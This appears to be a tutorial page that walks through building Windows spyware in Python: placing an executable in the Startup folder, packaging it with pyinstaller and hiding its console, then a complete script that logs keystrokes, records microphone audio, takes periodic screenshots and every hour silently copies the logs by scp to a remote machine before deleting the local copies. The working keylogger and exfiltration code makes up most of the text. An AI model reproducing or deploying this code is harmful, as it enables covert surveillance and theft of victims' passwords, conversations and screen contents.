Auto-run
Auto-run
This will discuss windows executables
you can do windows+R the type shell:startup
It will open C:\Users<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Anything in this folder will run at boot
Create simple python exe
Real malware isn’t written in python lol but let’s run with this
pip install pyinstaller
pyinstaller yourfile.py -F --onefile
Make exe hidden
There will be a brief cmd popup whenever your script runs, very suspicious, let’s remove it.
There are many tutorials and many different ways and will probably change in future windows versions.
A simple one in this case is add --noconsole to pyinstaller.
Recording audio
pip install pyaudio
import pyaudio
import wave
def record_audio(seconds, filename):
p = pyaudio.PyAudio()
fs = 44100
chunk = 1024
stream = p.open(format=pyaudio.paInt16,channels=2,rate=fs,frames_per_buffer=chunk,input=True)
frames = []
for _ in range(0, int(fs / chunk * seconds)):
data = stream.read(chunk)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
wf = wave.open(filename, 'wb')
wf.setnchannels(2)
wf.setsampwidth(p.get_sample_size(pyaudio.paInt16))
wf.setframerate(fs)
wf.writeframes(b''.join(frames))
wf.close()
record_audio(seconds=10, filename="output.wav")
Final
# scp ... connor@192.168.1.114:/home/connor/Documents/...
import threading
from pynput.keyboard import Key, Listener
import os
import pyaudio
import wave
from time import sleep, time
from PIL import ImageGrab
count = 0
keys = []
user = os.environ.get("USERNAME")
basedir = f"C:\\Users\\{user}\\Documents\\system\\log"
def cleanup():
os.system(f"del /Q {basedir}\\audio")
os.system(f"del /Q {basedir}\\ss")
for d in [basedir, f"{basedir}/audio", f"{basedir}/ss"]:
if not os.path.exists(d):
os.makedirs(d)
def handle_keys():
def on_press(key):
global keys, count
keys.append(key)
count += 1
if (count >= 1):
count = 0
write_file(keys)
keys = []
def write_file(keys):
with open (f"{basedir}/log.txt", "a") as f:
for key in keys:
k = str(key).replace("'","")
if k.find("space") > 0:
f.write("\n")
elif k.find("Key") == -1:
f.write(k)
def on_release(key):
return True #never release
with Listener(on_press = on_press, on_release = on_release) as listener:
listener.join()
def record_audio(seconds, filename):
p = pyaudio.PyAudio()
fs = 44100
chunk = 1024
stream = p.open(format=pyaudio.paInt16,channels=2,rate=fs,frames_per_buffer=chunk,input=True)
frames = []
for i in range(0, int(fs / chunk * seconds)):
data = stream.read(chunk)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
wf = wave.open(filename, 'wb')
wf.setnchannels(2)
wf.setsampwidth(p.get_sample_size(pyaudio.paInt16))
wf.setframerate(fs)
wf.writeframes(b''.join(frames))
wf.close()
def handle_audio():
while True:
fname = f"{basedir}/audio/{int(time())}"
record_audio(seconds=3500, filename=fname)
def handle_ss():
while True:
snapshot = ImageGrab.grab()
save_path = f"{basedir}/ss/{int(time())}.jpg"
snapshot.save(save_path)
sleep(20*60)
def handle_send():
while True:
sleep(3600)
success = os.system(f"scp -r {basedir} connor@192.168.1.114:/home/connor/Documents/logs > NUL 2> NUL")
if success == 0:
cleanup() # delete after sending
if __name__ =="__main__":
t1 = threading.Thread(target=handle_keys)
t2 = threading.Thread(target=handle_audio)
t3 = threading.Thread(target=handle_send)
t4 = threading.Thread(target=handle_ss)
t1.start()
t2.start()
t3.start()
t4.start()
t1.join()
t2.join()
t3.join()
t4.join()